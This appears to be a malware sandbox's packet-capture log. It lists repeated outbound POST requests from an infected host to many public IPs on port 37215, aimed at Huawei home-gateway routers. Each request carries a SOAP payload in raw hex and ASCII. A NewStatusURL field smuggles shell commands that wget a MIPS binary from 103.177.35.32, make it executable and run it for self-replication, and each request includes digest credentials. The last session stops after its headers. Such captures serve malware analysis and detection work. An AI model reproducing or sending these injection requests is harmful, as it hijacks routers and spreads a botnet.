                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1561192.168.2.233448663.253.162.14637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549282074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1562192.168.2.234498441.226.167.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549330950 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1563192.168.2.2345684157.137.78.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549330950 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1564192.168.2.2341838193.80.241.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.549506903 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1565192.168.2.2336832157.158.25.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550554991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1566192.168.2.235935893.39.57.13437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550560951 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1567192.168.2.2355290197.6.55.9537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550566912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1568192.168.2.234369673.203.222.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550668955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1569192.168.2.234914841.21.77.18237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550689936 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1570192.168.2.234817441.211.88.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.550697088 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
